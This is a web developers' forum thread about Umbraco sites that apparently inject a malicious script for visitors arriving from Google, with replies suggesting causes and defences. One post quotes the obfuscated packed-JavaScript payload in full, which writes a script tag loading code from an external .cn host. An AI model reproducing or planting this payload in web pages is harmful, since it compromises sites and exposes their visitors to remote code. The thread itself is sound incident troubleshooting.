Copied to clipboard

Flag this post as spam?

This post will be reported to the moderators as potential spam to be looked at


  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 01:58
    Katie
    0

    Umbraco site Hacked

    Hi, I have two Umbraco websites which appear to have been hacked. JavaScript is injected when visiting only certain URLs from Google. When viewing the page source by not coming through Google there is no JavaScript injected. I have checked all template files, and there is nothing in there. I have even wiped all code from the pages concerned, so only a blank page is available to be rendered, but the script is still injected when the web request comes from Google. We have completed virus and malware scans, but all are clear. Does anyone know what else we could check to find the injected script please? Thank you in advance.

  • Linx 98 posts 258 karma points
    Oct 18, 2023 @ 09:53
    Linx
    0

    From what you are saying, it sounds like you are suggesting there could be a bug with the Umbraco you are using.

    What version of Umbraco 9 are you using? When you say hacked do you mean the entire site has been compromised (as in access to the database) or just a page is rendering with content you have no control over? Have you also tried a different browser? Is there anyway this can be replicated against a local site?

    Thanks

  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 10:07
    Katie
    0

    We are using version 10.2.1. It is only when certain pages are visited from a link on Google. I can’t recreate the redirect from the website navigation directly.
    No I can’t replicate it locally.

    Thank you

  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 10:10
    Katie
    0

    We have found this script being sent back: eval(function(p,a,c,k,e,r){e=function(c){return(c

    redirecting people to https://br.zmdesf.cn/br.js

  • Linx 98 posts 258 karma points
    Oct 18, 2023 @ 10:34
    Linx
    0

    Any chance you could update your site to the later version of Umbraco 10? 10.7 being the latest to see if the issue remains?

  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 11:07
    Katie
    0

    Not easily, it is a live website. But do you think this would fix it?

    Thank you

  • Linx 98 posts 258 karma points
    Oct 18, 2023 @ 11:51
    Linx
    0

    I can't say yes for definite but that would be the first action to take.

    The Umbraco guys do visit this forum so if it is a security concern they would act on it fast however they too may ask you to update to the latest version in case it's a known vulnerability and already addressed.

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 07:39
    Katie
    0

    I have upgraded to version 10.7, but unfortunately this hasn't helped.

  • Aaron 58 posts 406 karma points MVP 2x c-trib
    Oct 18, 2023 @ 12:11
    Aaron
    0

    Is your site behind a CDN?

    Could it be possible that a redirect has been intercepted and then cached in the CDN and is not actually hitting the site at all?

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 07:40
    Katie
    0

    No, unfortunately we don't use a CDN.

  • Nik 1617 posts 7263 karma points MVP 7x c-trib
    Oct 19, 2023 @ 08:57
    Nik
    0

    It could be worth putting a CSP in place incase the issue is that one of your third party scripts has been compromised and is injecting in the untrusted javascript.

    There are limited way's that erronious JavaScript can get into your site.

    1. Umbraco back office user was compromised and that user's permissions have the ability to edit views/partial views / add scripts to pages via the content section. - All back office user accounts should reset their passwords
    2. Hosting environment has been compromised and accessed directly and the views updated from there - speak to your hosting provider and see if they can identify direct access.
    3. Existing 3rd party JavaScript has been compromised - having a CSP would help protect against this (not 100% but pretty good).
    4. CDN/Domain traffic interception is occurring - much harder to detect.

    Also, have you confirmed that your site is running on HTTPS with a valid certificate and has things like HSTS enabled which should decrease the ability for someone to browse the site on HTTP and have the traffic intercepted.

    Thanks

    Nik

  • Sotiris Filippidis 286 posts 1501 karma points
    Oct 19, 2023 @ 16:28
    Sotiris Filippidis
    1

    Adding to the previous answer:

    Since you know what the offending code is, it would be worth to try searching for it in the production website files. This would give you a hint as to whether it's a hosting environment / umbraco backoffice compromise or some other cause.

    If you do find the code inside one or more of your views, for example, there are high chances someone has the ability to access the actual files, either from the Umbraco backoffice or from the hosting environment. So changing backoffice users' passwords and ensuring that the hosting environment doesn't allow any other technologies to be used (like classic asp, php and so forth) can provide you some kind of increased security there.

    If it's not in the files, maybe it would be worth to minimize the attack surface by swapping CDN calls to JS files with local calls (get the files on your hosting environment's filesystem and use them from there).

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 07:44
    Katie
    0

    I have searched everywhere, and can't find the code.

    Yes I have swapped the CDN calls to all local files in case this was where the issue was coming from, but unfortunately this hasn't resolved it either.

    It seems so well hidden. The only additional piece of information I seem to have spotted, it when it is in the process of injecting the script, it briefly has an error saying resource not found.

    Thank you so much for all your suggestions.

  • Chriztian Steinmeier 2800 posts 8791 karma points MVP 8x admin c-trib
    Oct 21, 2023 @ 16:45
    Chriztian Steinmeier
    0

    Hi Katie,

    Are you absolutely sure the URLs from Google are on your site, and not a spoofed site with very similar-looking URLs?

    Seems a bit strange that only when visiting from Google (of all places) the scripts are injected...

    /Chriztian

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 18:39
    Katie
    0

    Yes, it is so odd. This is why I just can't work it out. This is the code they seem to be injecting:

    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))',44,44,'|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|br.zmdesf|cn|br|js|split'.split('|'),0,{}))
    
  • Jeffrey Schoemaker 408 posts 2138 karma points MVP 8x c-trib
    Oct 21, 2023 @ 18:14
    Jeffrey Schoemaker
    0

    Hi Katie,

    If you send me an email I will see how I can help you out!

    Kind regards,

    Jeffrey

  • Richard Hamilton 12 posts 83 karma points
    Feb 08, 2024 @ 15:24
    Richard Hamilton
    0

    I have also been getting this on an Umbraco 7 site and earlier Umbraco 8 sites. Has anyone worked out how to get rid of it?

    The Umbraco 8 site, I have upgraded to 8.18, which seems to have solved it for now.

  • Steve Morgan 1349 posts 4459 karma points c-trib
    Feb 11, 2024 @ 16:53
    Steve Morgan
    0

    Do you have any third party JS libraries? Google Tag Manager or anything like that? If your GTM container has been hacked they could have injected it there.

    If you view the source of the page is it already thereor appears later..

    I would guess something is injecting it in via JS. Try stripping all JS references and add them back one by one.

Please Sign in or register to post replies

Write your reply to:

Draft